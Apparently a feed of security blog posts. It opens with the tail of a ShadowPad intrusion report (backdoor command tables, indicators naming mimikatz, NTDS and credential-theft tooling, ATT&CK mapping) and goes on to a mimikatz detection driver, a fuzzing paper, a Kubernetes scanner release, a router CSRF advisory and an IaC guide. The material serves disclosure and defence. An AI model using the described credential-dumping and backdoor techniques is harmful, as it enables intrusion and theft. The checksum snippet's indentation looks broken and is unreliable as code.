Main module  0xC49D0039  Sends number of times the Shadowpad files were detected to be deleted. 
Main module      0xC49D0016               Deletes Shadowpad registry keys. 
Main module      0xC49D0035               Enters sleep mode for 3 seconds in total. 
Main module      0xC49D0036               Enters sleep mode for 5 seconds in total. 
Main module      0xC49D0010               Retrieves Shadowpad execution information. 
Main module      0xC49D0012               Updates Shadowpad configuration (in registry). 
Main module      0xC49D0014               Deletes Shadowpad module from registry. 
Main module      0xC49D0015               Unloads a Shadowpad module. 
Main module      0xC49D0020               Retrieves Shadowpad current configuration (from registry). 
Main module      0xC49D0021               Updates the Shadowpad configuration in registry and (re)starts the TCP/UDP servers. 
Main module      0xC49D0022               Deletes Shadowpad registry entries and starts the TCP/UDP servers.   
Main module      0xC49D0050               Retrieves Shadowpad proxy configuration from registry. 
Main module      0xC49D0051               Updates Shadowpad proxy configuration. 
Main module      0xC49D0052               Updates Shadowpad proxy configuration by index. 
Main module      0xC49D0053               Sets Shadowpad proxy configuration bytes to 0 
Main module      Any Module ID            Loads and initialises the specified module ID. 
Files manager module    0x67520006        File operations (copy,delete,move,rename). 
Files manager module    0x67520007        Executes a file. 
Files manager module    0x67520008        Uploads/Downloads file to/from C2. 
Files manager module    0x6752000A        Searches for a specified file. 
Files manager module    0x6752000C        Downloads a file from a specified URL. 
Files manager module    0x67520005        Timestomp a file. 
Files manager module    0x67520000        Get logical drives information. 
Files manager module    0x67520001        Searches recursively for a file. 
Files manager module    0x67520002        Checks if file/directory is writable. 
Files manager module    0x67520003        Creates a directory. 
Files manager module    0x67520004        Gets files list in a given directory 
TCP/UDP module          0x54BD0000        Loads TCP module and proxy data via it. 
TCP/UDP module          0x54BD0001        Proxies UDP network data. 
Desktop module          0x62D50000        Enumerates monitors. 
Desktop module          0x62D50001        Takes desktop screenshot. 
Desktop module          0x62D50002        Captures monitor screen. 
Desktop module          0x62D50010        Gets desktop module local database file path.  
Desktop module          0x62D50011        Reads and sends the contents of local database file to the C2. 
Desktop module          0x62D50012  Writes to local database file and starts a thread that constantly takes desktop screenshots. 
Processes manager module  0x70D0000      Gets processes list along with their information 
Processes manager module  0x70D0001      Terminates a specified process 
Network Connections module  0x6D0000     Gets TCP network table. 
Network Connections module  0x6D0001     Gets UDP network table.   
PIPEs module  0x23220000    Reads/Writes data to PIPEs. 
Propagation module    0x2C120010     Get module’s configuration. 
Propagation module    0x2C120011     Transfer network data between C2 and PIPEs. 
Propagation module    0x2C120012  Constant transfer of network data between C2 and PIPEs. 
Propagation module    0x2C120013  Transfer network data between C2 and PIPEs. 
Propagation module    0x2C120014           Constant transfer of network data between C2 and PIPEs. 
Propagation module    0x2C120015  Transfer network data between C2 and PIPEs. 
Propagation module    0x2C120016  Constant transfer of network data between C2 and PIPEs. 
Propagation module  0x2C120017  Transfer network data between C2 and PIPEs. 
Propagation module  0x2C120018  Transfer network data between C2 and PIPEs. 
Scheduled tasks module  0x71CD0000    Gets a list of the scheduled tasks. 
Scheduled tasks module  0x71CD0001    Gets information of a specified scheduled task. 
Wi-Fi stealer module  0xDC320000  Collects credentials/information of available Wi-Fi devices. 
Network discovery module  0xF36A0000  Collects MAC addresses. 
Network discovery module  0xF36A0001  Collects IP addresses information. 
Network discovery module  0xF36A0003  Port scanning. 
Console module  0x329A0000             Starts a console mode in the compromised host. 
Keylogger module    0x63CA0000          Reads the keylogger file and sends its content to the C2. 
Keylogger module    0x63CA0001  Deletes keylogger file. 
Table 3 – Modules Network Commands 

Below are listed the available modules, which do not have network commands (Table 3). 

Module ID  Description 
E8B5  QUICKLZ library module. 
7D82  Sockets connection module (supports SOCKS4, SOCKS5 and HTTP). 
C7BA  TCP module. 
Table 4 – Available modules without network commands 

Below are listed the modules that we identified after analysing the main module of ShadowPad but were not recovered. 

Module ID       Description 
0x25B2          UDP network module. 
0x1FE2          HTTP network module. 
0x9C8A          HTTPS network module. 
0x92CA          ICMP network module 
0x64EA  Unknown 
Table 5 – Non-Recovered ShadowPad Modules

Misc 

  1. ShadowPad uses a checksum method to compare certain values (e.g., if it runs under        certain access rights). This method has been implemented below in Python: 
ror = lambda val, r_bits, max_bits: \ 
((val & (2**max_bits-1)) >> r_bits%max_bits) | \ 
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) 
rounds = 0x80 

data = b"" 
output = 0xB69F4F21 
max_bits = 32 
counter = 0 

for i in range( len(data) ): 
 data_character = data[counter] 
 if (data_character - 97)&0xff <= 0x19: 
  data_character &= ~0x20&0xfffffff 
  counter +=1 
  output = (data_character + ror(output, 8,32)) ^ 0xF90393D1 
  print ( hex( output )) 
  • Under certain modes, ShadowPad chooses to download and inject a payload from its        command-and-control server. ShadowPad parses its command-and-control server        domain/IP address and sends a HTTP request. The reply is expected to be a payload,        which ShadowPad injects into another process. 
          

ANALYST NOTE: In case the IP address/Domain includes the character ‘@’,                      ShadowPad decrypts it with a custom algorithm. 

Indicators of Compromise

IOC Indicator Type Description
C:\wso2is-4.6.0\BVRPDiag.exe File Path Legitimate executable to sideload PoisonIvy
C:\wso2is-4.6.0\BVRPDiag.tsi File Path  
C:\wso2is-4.6.0\BVRPDiag.dll File Path PoisonIvy
C:\wso2is-4.6.0\ModemMOH.dll File Path
C:\Windows\System32\spool\drivers\color\K7AVWScn.dll File Path Previously undocumented C2 framework
C:\Windows\System32\spool\drivers\color\K7AVWScn.doc File Path Unknown file in the same location as PosionIvy
C:\Windows\System32\spool\drivers\color\K7AVWScn.exe File Path Legitimate executable to sideload PoisonIvy
C:\Windows\System32\spool\drivers\color\secur32.dll File Path ShadowPad DLL
C:\Windows\System32\spool\drivers\color\secur32.dll.dat File Path ShadowPad Encrypted Configuration
C:\Windows\System32\spool\drivers\color\WindowsUpdate.exe File Path Legitimate executable to sideload ShadowPad
C:\Windows\Temp\WinLog\secur32.dll File Path ShadowPad DLL
C:\Windows\Temp\WinLog\secur32.dll.dat File Path ShadowPad Encrypted Configuration
C:\Windows\Temp\WinLog\WindowsEvents.exe File Path Legitimate executable to sideload ShadowPad
C:\ProgramData\7z.dll File Path Archiving tool
C:\ProgramData\7z.exe File Path Archiving tool
C:\Users\Public\AdFind.exe File Path Reconnaissance tooling
C:\Users\Public\nbtscan.exe File Path Reconnaissance tooling
C:\Users\Public\start.bat File Path Unknown batch script, suspected to start execution of mimikatz
C:\Users\Public\t\64.exe File Path Unknown executable, suspected mimikatz
C:\Users\Public\t\7z.exe File Path  Archiving tool
C:\Users\public\t\browser.exe File Path Unknown attacker executable
C:\Users\Public\t\nircmd.exe File Path NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface.
C:\users\public\t\test.bat File Path Unknown attacker batch script
C:\Users\Public\test.bat File Path Unknown attacker batch script
C:\Users\Public\test.exe File Path Unknown attacker executable
C:\Users\Public\test\Active Directory\ntds.dit File Path Staging location for NTDS dump
C:\Users\Public\test\registry\SECURITY File Path Staging location for registry dump
C:\Users\Public\test\registry\SYSTEM File Path Staging location for registry dump
C:\Users\Public\WebBrowserPassView.exe File Path NirSoft tool for recovering credentials from web browsers.
C:\Windows\debug\adprep\P.bat File Path Unknown attacker batch script
C:\Windows\system32\spool\drivers\affair.exe File Path Unknown attacker executable
C:\Windows\System32\spool\drivers\color\SessionGopher.ps1 File Path Decrypts saved session information for remote access tools.
C:\windows\system32\spool\drivers\color\tt.bat File Path Unknown attacker batch script
C:\Windows\Temp\best.exe File Path Tree.exe
ip445.ps1 File Name Unknown PowerShell script suspected to be related to network reconnaissance
ip445.txt File Name Suspected output file for ip445.ps1
nbtscan.exe File Name Attacker tooling
SOFTWARE: Classes\CLSID\*\42BF3891 Registry Key Encrypted ShadowPad configuration
SOFTWARE: Classes\CLSID\*\45E6A5BE Registry Key Encrypted ShadowPad configuration
SOFTWARE: Classes\CLSID\*\840EE6F6 Registry Key Encrypted ShadowPad configuration
SOFTWARE: Classes\CLSID\*\9003BDD0 Registry Key Encrypted ShadowPad configuration
Software:Classes\CLSID\*\51E27247 Registry Key Encrypted ShadowPad configuration
Software\Microsoft\*\*\009F24BCCEA54128C2344E03CEE577E12504DD569C8B48AB8B7EAD5249778643 Registry Key Encrypted ShadowPad module
Software\Microsoft\*\*\5F336A90564002BE360DF63106AA7A7568829C6C084E793D6DC93A896C476204 Registry Key Encrypted ShadowPad module
Software\Microsoft\*\*\FF98EFB4C7680726BF336CEC477777BB3BEB73C7BAA1A5A574C39E7F4E804585 Registry Key Encrypted ShadowPad module
D1D0E39004FA8138E2F2C4157FA3B44B MD5 Hash PoisenIvy DLL
54B419C2CAC1A08605936E016D460697 MD5 Hash Undocumented backdoor DLL
B426C17B99F282C13593954568D86863 MD5 Hash Undocumented backdoor related file
7504DEA93DB3B8417F16145E8272BA08 MD5 Hash ShadowPad DLL
D99B22020490ECC6F0237EFB2C3DEF27 MD5 Hash ShadowPad DLL
1E6E936A0A862F18895BC7DD6F607EB4 MD5 Hash ShadowPad DLL
A6A19804248E9CC5D7DE5AEA86590C63 MD5 Hash ShadowPad DLL
4BFE4975CEAA15ED0031941A390FAB55 MD5 Hash ShadowPad DLL
87F9D1DE3E549469F918778BD637666D MD5 Hash ShadowPad DLL
8E9F8E8AB0BEF7838F2A5164CF7737E4 MD5 Hash ShadowPad DLL

Mitre Att&ck

Tactic Technique ID Description
Initial Access Exploit Public-Facing Applications T1190 Initial access was gained via the threat actor exploiting CVE-2022-29464 to create a web shell
Execution Command and Scripting Interpreter: PowerShell T1059:001 PowerShell based tools PowerView and SessionGopher were executed across the estate for reconnaissance and credential harvesting. Additionally, hands on keyboard commands were identified as being executed to confirm which version of the malware was present.
Execution Command and Scripting Interpreter: Windows Command Shell T1059:003 A scheduled task used by the threat actor was used to launch a Windows Command Shell. The purpose is not known.
Execution Command and Scripting Interpreter: Python T1059:006 Several compiled python binaries were identified. It is likely the binaries related to the creation of an FTP server.
Execution Scheduled Task/Job: Scheduled Task T1053 A scheduled task named “update” was observed and configured to execute a command prompt on multiple hosts throughout the environment. Upon successful execution of the task the threat actor then deleted the task from the host
Execution Exploitation for Client Execution T1203 The threat actor leveraged CVE-2022-29464 to deploy web shells and allow remote command execution on patient zero.
Execution Windows Management Instrumentation (WMI) T1047 WMI was used by the threat actor to carry out reconnaissance activity.
Persistence Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 A run key for the local administrator was created to execute the malicious backdoor.
Persistence Create or Modify System Process: Windows Service T1543.003 Two malicious services were deployed widely across the estate for persistence of the backdoors. Both services execute a legitimate binary which is stored in the same location as a malicious DLL, when executed the legitimate binary would side load the malicious DLL containing the backdoor.
Privilege Escalation Valid Accounts: Domain Accounts T1078.002 The threat actor was primarily using domain administrator credentials to move laterally throughout the attack, allowing them to blend in with legitimate administrator activity.
Defence Evasion Impair Defenses: Downgrade Attack T1562.010 The threat actor was observed utilising PowerShell downgrades, this is typically used by threat actors to avoid the script logging capabilities of PowerShell version 5+
Defence Evasion Indicator Removal on Host: File Deletion T1070.004 The threat actor routinely removed the majority of tooling deployed throughout the attack from hosts upon completion of their objectives.
Defence Evasion Indicator Removal on Host: Timestomp T1070.006 The threat actor timestomped all files relating to the backdoors including the legitimate binary and the malicious DLL.
Defence Evasion Modify Registry T1112 The modules for ShadowPad were stored within the registry in an encrypted format. The keys for the stored data are generated depending on the volume serial number of the host.
Defence Evasion Obfuscated Files or Information T1027 The ShadowPad configuration was stored within an encrypted registry hive. The keylogger module of ShadowPad created an encrypted output file on the host.
Defence Evasion Masquerading: Rename System Utilities T1036.003 The threat actor leveraged a legitimate Windows DLL, secur32.dll, as the name of the configuration file for the ShadowPad backdoor.
Defence Evasion Process Injection: Process Hollowing T1055.012 Upon execution ShadowPad spawns a sacrificial process, which then utilises the technique of process hollowing to inject into the process.  
Defence Evasion Hide Artefacts: Hidden Files and Directories T1564.001 Several malicious files were identified as having the NTFS attribute of hidden.
Defence Evasion Hijack Execution Flow: DLL Search Order Hijacking T1574.001 The backdoors leveraged DLL Search Order Hijacking.
Credential Access Credentials from Password Stores: Credentials from Web Browsers T1555:003 The NirSoft tool WebBrowserPassView.exe was also identified as being executed by the attacker.
Credential Access Credentials from Password Stores: Windows Credential Manager T1555.004 Credential harvesting which indicated credentials from Windows Credential Manager were collected was identified on a domain controller.
Credential Access OS Credential Dumping: LSASS Memory T1003.001 ProcDump.exe was leveraged on patient zero during the attack in order to dump credentials stored in the process memory of Local Security Authority Subsystem Service (LSASS).
Credential Access OS Credential Dumping: NTDS T1003.003 The NTDS.dit was dumped and exfiltrated from a domain controller for each domain.
Credential Access Unsecured Credentials: Credentials in Files T1552.001 Several instances of passwords in plaintext files were observed on hosts where ShadowPad was installed/
Credential Access Input Capture: Keylogging T1056:001 ShadowPad instances had a Keylogger module installed.
Discovery File and Directory Discovery T1083 Tree.exe was used to enumerate files and directories on compromised hosts.
Discovery Network Share Discovery T1135 A PowerShell script named ip445.ps1 was used throughout the attack to enumerate network shares across the Windows estate.
Discovery System Network Configuration Discovery T016 AdFind.exe can extract subnet information from Active Directory.
Discovery Account Discovery: Domain Account T1087.002 AdFind.exe can enumerate domain users.
Discovery Domain Trust Discovery T1482 AdFind.exe can gather information about organizational units (OUs) and domain trusts from Active Directory.
Discovery Permission Groups Discovery: Domain Groups T1069 AdFind.exe can enumerate domain groups.
Discovery Remote System Discovery T1018 AdFind.exe has the ability to query Active Directory for computers.
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 RDP was used by the threat actor to laterally move. It is unknown whether this was a deliberate act to move estates or if the threat actor was attempting to move to another domain.
Lateral Movement Remote Services: SMB/Windows Admin Shares T1021.002 The Powerview module of Powersploit was used to enumerate all SMB shares across the environment.
Lateral Movement Remote Services: Windows Remote Management T1021.006 WinRM was used by the actor during periods of network reconnaissance.
Lateral Movement Remote Services: Distributed Component Object Model T1021.003 Anti-virus alerts showed the threat actor as utilising WMI to laterally move to hosts across the network.
Collection Automated Collection T1119 Large scale credential harvesting was conducted against remote hosts from a domain controller.
Collection Data Staged: Remote Data Staging T1074.002 Credentials harvested by the threat actor were collected on a domain controller, prior to exfiltration.
Collection Input Capture: Keylogging T1056.001 ShadowPad instances had a Keylogger module installed which allowed them to capture the input of interactive sessions. The output was stored on disk in encrypted database files.
Collection Archive Collected Data: Archive via Utility T1560.001 The actor was routinely observed archiving collected data via 7zip.
Command and Control Encrypted Channel T1573 ShadowPad configurations indicated Command and Control communications were sent via port 443.
Command and Control Proxy: Internal Proxy T1090.001 ShadowPad instances had a Proxy module installed. It was identified that a proxy module was installed and was interacting via port 445.
Exfiltration Exfiltration Over C2 Channel T1041 ShadowPad has the capability to exfiltrate data.

[1] https://www.secureworks.com/research/shadowpad-malware-analysis

[2] https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html

[3] https://nvd.nist.gov/vuln/detail/CVE-2022-29464

Detecting Mimikatz with Busylight

30 September 2022 at 08:00

In 2015 Raphael Mudge released an article [1] that detailed that versions of mimikatz released after 8th of October, 2015 had a new module that was utilising certain types of external USB devices to flash lights in different colours if mimikatz was executed. The technique presented in the article required certain kind of busylights that are mainly used by developers to signal their availability to other employees in offices.

The reason why this module was merged into mimikatz is not clear, but it meant that unmodified versions of mimikatz could be physically detected if a device like this was plugged into the computer that was being attacked. Obviously, this kind of detection mechanism is not really feasible in enterprise environments for multiple reasons.

NCC Group had an idea that was put into research to improve on the basic idea, and a way was found to detect mimikatz activity reliably without significant deployment or development costs. Although the result of the research works perfectly and 100% reliable, it can only detect version of mimikatz with the busylight module compiled. Five out of eight variants were detected. More on the results at the end of this article.

The Idea

The idea was to detect the busylight interaction without an external USB device. Taking a look on the busylight devices, it quickly turned out that they do not require any special drivers, they are simple HID devices. Fortunately Windows has the capability to emulate any kind of devices including USB HID devices, and there are also open-source driver examples on Github that can be used for development reasons, so we were up for a promising start.

The Busylight Module

Mimikatz commited the busylight module into the Github source on the 8th of October, 2015. Every release since has the module compiled module that in a nutshell does the following things:

  • Exposes the module to the user, which can be interacted with:
Figure 1 – busylight model invoked
  • It also sends an initialisation sequence to the busylight in a separate thread when the tool gets executed
  • Sends a static keep-alive sequence every 5 seconds
  • Upon exit it sends a final sequence as well

Looking through mimikatz’s code, by default it only supports 6 different type of busylights. The PID and VID numbers are hardcoded and their capabilities as well, so the code can recognize a specific device and send commands accordingly:

Figure 2 – Supported Busylight devices

The Solution

Putting the pieces together, if we can create an emulated HID device with one of the PID/VID values above and listen for the sequences that are sent by mimikatz, we can log those events. Possibly the most secure and portable way to do this would be to use a user-mode driver with low privileges to emulate the device and capture the sequences sent by mimikatz, and when an event happened (start, keep-alive or stop) we would invoke a function from a DLL.

There are multiple ways to do this, but the most user- and coder-friendly version was to use the HID Minidriver Sample from Microsoft’s Github [2], which was based on UMDF 2 (User Mode Driver Framework). Older UMDF versions could be used as well to implement the detection too, but for simplicity we stick to UMDF 2. KMDF (Kernel Mode Driver Framework) is also a possibility, but that would grant higher privilege level for our driver, since it would be in Kernel-space, which we do not require for this, neither want to increase the attack surface of the kernel by adding 3rd party modules.

Implementing changes seemed to be straightforward at this point, but as always it came with a few complications. In general the following things were changed in the sample source code:

  • Vendor and Product ID to match one of the mimikatz supported ones
  • HID Report Descriptor to match the device capabilities
  • The WriteReport() function to check the byte sequences that mimikatz sent and call a function from an external DLL that implements the required functionality

Offloading the functionality to an external DLL made sense, since we do not want to change the driver’s functionality all the time and redeploy it to the machine again and again. Also requirement from different clients could differ, by changing the DLL only would provide greater flexibility.

The Implementation & Usage

The implementation of the Proof-of-Concept driver and sample DLL can be found here: [3].

The Sample DLL shipped with this project is just a Proof-of-Concept that shows how the driver works. In case any of the three events triggered, one of the following functions will be called (ulPid is the Process ID of the process that triggered the event):

  • VOID start(ULONG ulPid)
  • VOID keepalive(ULONG ulPid)
  • VOID stop(ULONG ulPid)

The DLL is capable to log the event into the event log, to the debugger attached to WUDFhost.exe or send the log to a remote syslog server. In case a different event handling is required, that can be easily added to the DLL or it can be replaced easily.

In case the driver was signed with a trusted certificate, the installation is quite straightforward. The DLL needs to be copied into the system32 folder, so it cannot be modified by low-privileged users and the driver can be installed by Microsoft’s Device Console utility (devcon.exe).

After successful installation the following two devices will show up in Device Manager:

Figure 3 – Two devices added

Upon execution of mimikatz, no difference can be seen, and by listing the busylight devices one shows up:

Figure 4 – One compatible Busylight shown in the list

More importantly in the event log, the exact time of execution and termination can be found with keep-alive messages in every 5 seconds. The message also consist the Process ID of mimikatz for forensics purposes.

Figure 5 – Warnings in event log

Since the driver is implemented as a user-mode driver, it is running as NT AUTHORITY\LocalService, therefore with very limited privileges, therefore cannot be used to enumerate process related information. It is recommended to integrate this tool with EDR/SIEM related products to enhance its capability.

It would be also possible to use the driver as a kernel-mode driver to get more privileges, but as explained that would increase the attack surface of the OS.

The detection and limitations

As detailed, the PoC driver was implemented as UMDF 2 [4], which means it could be only used on Windows 8.1 or newer. Support for older operating systems could be done by porting the driver to UMDF 1 for example.

The detection of this PoC was tested against several publicly available mimikatz versions. (Un)fortunately Metasploit’s and Cobalts Strike’s mimikatz binaries were not compiled with the busylight module, therefore detection this way was not possible.

Tested variants:

  • Original version of Mimikatz since 8th of October 2015 (Detected)
  • Original compiled into DLL (Detected)
  • Original compiled into PowerShell (Invoke-Mimikatz) (Detected)
  • PowerSploit – Invoke-Mimikatz (Detected)
  • CrackMapExec – Invoke-Mimikatz (Detected)
  • Metasploit kiwi module (NOT Detected)
  • Cobalt Strike (NOT Detected)
  • Pypykatz (NOT Detected)

Presentation

The busylight related method was the phase one for a longer research on alternative detection techniques against mimikatz. The full research (phase one and two) was presented on the following conferences:

Since the talk covered phase two as well, which was a research on sniffing ConDrv related IOCTLs and detecting mimikatz based on console communication, the code for both phases was open-sourced and can be found below:

Write-up for phase two is coming up soon.

References

[1] Revolutionary Device Detects Mimikatz Use – https://www.cobaltstrike.com/blog/revolutionary-device-detects-mimikatz-use/

[2] HID Minidriver Sample (UMDF version 2) https://github.com/microsoft/Windows-driver-samples/tree/master/hid/vhidmini2

[3] https://github.com/nccgroup/mimikatz-detector-busylight

[4] https://docs.microsoft.com/en-us/windows-hardware/drivers/wdf/umdf-version-history

Whitepaper – Project Triforce: Run AFL On Everything (2017)

27 September 2022 at 19:28

Six years ago, NCC Group researchers Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. Today, we’re releasing it for the curious reader and historical archives alike. While fuzzing has come a long way since 2016/2017, we hope that this paper will provide some valuable additional detail on TriforceAFL to the research community beyond the original TriforceAFL blog post (2016).

Abstract

In this paper we present Project Triforce, our extension of American Fuzzy Lop (AFL),
allowing it to fuzz virtual machines running under QEMU’s full system emulation mode.
We used this framework to build TriforceLinuxSyscallFuzzer (TLSF) syscall fuzzer, which
has already found several kernel vulnerabilities. This paper details the iteration and
design of both TriforceAFL and TLSF, both of which encountered some interesting
obstacles and discoveries. Then, we’ll analyze crashes found by the fuzzer, and talk
about future directions, including our work fuzzing OpenBSD.


This whitepaper may be downloaded below:

Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite

By: Liyun Li
22 September 2022 at 17:41

tl;dr You can now have Scout Suite scan not only your cloud environments, but your Kubernetes clusters. Just have your kubeconfig ready and run the following commands:

$ pip3 install --user https://github.com/nccgroup/ScoutSuite/archive/develop.zip
$ scout kubernetes

Background

NCC Group’s Container Orchestration Security Service (COSS) practice regularly conducts Kubernetes cluster configuration reviews spanning platform-managed Kubernetes clusters across different cloud platforms and self-hosted clusters.

As a first step, consultants delivering these assessments generally download target cluster resources for offline static analysis. To automate some of the more rote steps, we have several scripts and tools to batch together certain kubectl configuration gathering and analysis steps. These types of automations greatly increase the efficiency of an assessment, leaving more time for deeper manual review (and custom scripting), enabling overall greater depth and quality of coverage when assessing a cluster.

kubectl — and its raw output — is generally not that great to work with by itself. Additionally, from our use of open source Kubernetes security tooling, we have found the current overall tooling situation to be non-ideal, with most tooling spitting out text-based output to stdout and/or dot files for graphviz that must be rendered manually. To remedy this, we have been working to integrate our tooling and methodologies into Scout Suite, our open-source cloud environment scanner. This scanner has a mature output framework for reviewing environments efficiently.

 

Kubernetes Provider for Scout Suite (aka “Kubescout”)

Overall, the process for the static analysis phase of a Kubernetes cluster configuration review is similar to a cloud configuration review (e.g. for AWS, Azure, GCP, etc.), and Scout Suite already has a mature user interface for displaying most, if not all, resources pulled from a platform.

Thus the birth of Kubescout, a project to develop a Kubernetes cluster auditing feature integrated into Scout Suite.

How It Works

To audit a cluster, a kubeconfig file must be present on the file system that has Scout Suite installed. On a Linux host, the location is typically ~/.kube/config.

Using the cluster credentials, Kubescout first determines the cluster context and downloads all cluster resources from the cluster’s API endpoint; however, Kubescout will ensure that the actual values of Secrets are redacted before they are stored on disk. Additionally, if a supported cluster provider (currently EKS, GKE, and AKS) is given, it will also attempt to use the relevant platform credentials, if available, to download resources relevant to the cluster configuration review, such as control plane logging configurations.

After the relevant data is retrieved, it is aggregated and processed to be consumed by Scout Suite’s ruleset engine for finding generation and subsequently the user interface, which eventually becomes a static HTML page powered by custom Handlebars templates. No local web server is required to properly view the HTML page, although the addition of such functionality is part of Scout Suite’s own roadmap for improved performance and development flows.

With a graphical user interface, one can better navigate resources to better identify issues and reduce the rate of false positives. For example, finding hard-coded secrets in ConfigMap objects is easier. And unnecessarily privileged subjects are easier to detect (courtesy of Iain Smart, the COSS practice lead).

 

Kubescout additionally provides full support for custom resources, enabling not only review of their definitions (CRDs), but of the objects themselves, including for rule processing. This is important as the absence of obvious admission webhooks may belie the existence of an admission controller, that may otherwise be identified from the presence of custom resources.

Installation

Kubescout is currently enabled within the develop branch of the main Scout Suite repository. Users can clone and install the specific branch using the following commands. Installing the develop branch of Scout Suite in a virtual environment (e.g. virtualenv) is recommended as the branch is under active development.

$ # optionally use a virtualenv
$ virtualenv scoutsuite-develop
$ source scoutsuite-develop/bin/activate

$ # Scout Suite installation
$ git clone -b develop https://github.com/nccgroup/ScoutSuite.git
$ cd ScoutSuite
$ pip3 install .
$ scout kubernetes

Alternatively, you can also pip install the develop branch zip URL:

$ # optionally use a virtualenv
$ virtualenv scoutsuite-develop
$ source scoutsuite-develop/bin/activate

$ # Scout Suite installation
$ pip3 install https://github.com/nccgroup/ScoutSuite/archive/develop.zip
$ scout kubernetes

Usage

Kubescout uses several options to determine the cluster context for scanning:

--config-file KUBERNETES_CONFIG_FILE Name of the kube-config file. By default, it will use Kubernetes’ default directory.
--context KUBERNETES_CONTEXT Cluster context to scan. By default, current_context from config file will be used.
--do-not-persist-config If specified, config file will NOT be updated when changed (e.g GCP token refresh).

Specifying the cluster provider can be done through -c or --cluster-provider. The following options are supported at the moment:

  • eks
  • gke
  • aks

To scan the cluster, use the kubernetes subcommand such as below:

scout kubernetes

Future Work

This initial release of Kubernetes support for Scout Suite is a feature preview providing a base subset of rules, including CIS Benchmarks rules, and core integrations for building out futher Kubernetes security analyses and analysis UXs. We plan to continue our work on Kubescout and hope to introduce the following features in the future:

  • More rules for automatic issue detection, including for common third-party Kubernetes components
  • Better RBAC review UX
  • Data pagination for a smoother user experience
  • A dedicated (and off-by-default!) dynamic testing mode that can verify certain flagged issues

Conclusion

With this new Scout Suite functionality, we hope to ease the pain of anyone looking to gain some insight into the security posture of their cluster, or who simply wants to learn more about Kubernetes (and may be surprised to see what is in their cluster ;).

Scout Suite welcomes GitHub issues and pull requests. The --debug option can be used to print exceptions in detail during development. The -l option can be used to test custom Handlebars templates.

The project repository can be found here.

Special Thanks

  • Iain Smart (for all the internal tools he wrote)
  • Jennifer Fernick (for approving the research)
  • Jeff Dileo (for overseeing the research)
  • Fernando Gallego Piñero and Ricardo Martin Rodríguez from the Scout Suite team (for answering so many of my Scout Suite questions)

Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router (CVE-2022-37413, CVE-2022-37414)

22 September 2022 at 15:00

Juplink’s RX4-1800 WiFi router was found to have multiple vulnerabilities exposing its owners to potential intrusion in their local WiFi network and complete overtake of the device. An attacker can remotely take over a device after using a targeted or phishing attack to change the router’s administrative password, effectively locking the owner out of their device.

Two vulnerabilities were uncovered, with links to the associated technical advisories below:

  • Technical Advisory: CSRF Vulnerability in Juplink RX4-1800 WiFi Router (CVE-2022-37413)
  • Technical Advisory: Lack of Current Password Validation for Password Change Functionality (CVE-2022-37414)

Technical Advisories:

CSRF Vulnerability in Juplink RX4-1800 WiFi Router (CVE-2022-37413)

Vendor: Juplink
Vendor URL: https://www.juplink.com
Versions Affected: All Versions
Systems Affected: RX4-1800
CVE Identifier: CVE-2022-37413
Severity: High 7.5 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)

Summary

The Juplink RX4-1800 WiFi router is a general consumer Wifi router that provides a web interface for configuration. The browser interface of the router was found to be vulnerable to cross-site request forgery (CSRF).

Impact

The WiFi router interface is vulnerable to CSRF. An attacker can trick a user into making unintended state-changing requests to the application, including changing the admin account password.

Details

Cross-Site Request Forgery (CSRF) is an attack that occurs when a user interacts with a malicious web site while logged into a vulnerable web application in the same browser. The malicious web site can cause the user’s browser to submit requests to the vulnerable application, causing various state-changing requests to be made in the context of the victim’s active session.

If the user is logged into the router web interface, an attacker could create a page like the example below and trick a user into clicking it to change the router administrative account password to any password of the attacker’s choosing.

Recommendation

This issue will remain exploitable to authenticated users as long as the vendor doesn’t fix it through a router firmware update.

Lack of Current Password Validation for Password Change Functionality (CVE-2022-37414)

Vendor: Juplink
Vendor URL: https://www.juplink.com
Versions Affected: All Versions
Systems Affected: RX4-1800
CVE Identifier: CVE-2022-37414
Severity: Medium 6.8 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Summary

The Juplink RX4-1800 WiFi router is a general consumer WiFi router that provides a web interface and admin account for configuration. It was found that the router web interface has insecure password change functionality.

Impact

An attacker can change the password of the admin account.

Details

There is password change functionality, referred to as ‘Modify Password’, located at the /nm_security.htm endpoint. When performing a password change, the user is asked to provide the old password. If the ‘Old Password’ field is blank or incorrect, an alert box is presented that says, “The old password is wrong!”

Use an interception proxy to inspect the HTTP POST request that is made when a valid password change request is submitted. You will see in the example POST request below that the old password is not included as a parameter in the body of the request, therefore there is no server-side validation of the old password. An attacker can use Cross-Site Request Forgery to trick the user and send a request to the web interface to change the password of the router’s admin account to one of the attacker’s choosing.

Recommendation

This issue will remain exploitable to authenticated users as long as the vendor doesn’t fix it through a router firmware update.

Disclosure Timeline:

July 1, 2022: Initial email from NCC to Juplink announcing to vendor that vulnerabilities were found in one of their devices.

August 12, 2022: NCC reached out to Juplink again to inform of the intent to publicly disclose the vulnerabilities unless they responded to us within the next 30 days.

September 22 2022: NCC Group informs Juplink that we will now be publishing all associated Technical Advisories for these vulnerabilities. 

As of the publishing date of this Technical Advisory, no response from Juplink has been received.

Thanks to

Nicolas Bidron, Andrea Shirley-Bellande, Jennifer Fernick, and David Goldsmith for their support throughout the research and disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

A Guide to Improving Security Through Infrastructure-as-Code

19 September 2022 at 10:00

Modern organizations evolved and took the next step when they became digital. Organizations are using cloud and automation to build a dynamic infrastructure to support more frequent product release and faster innovation. This puts pressure on the IT department to do more and deliver faster. Automated cloud infrastructure also requires a new mindset, a change in the approach about change and risk from them. Depending on the way that people use the technology though, it can reduce the risk and improve the quality of the infrastructure.

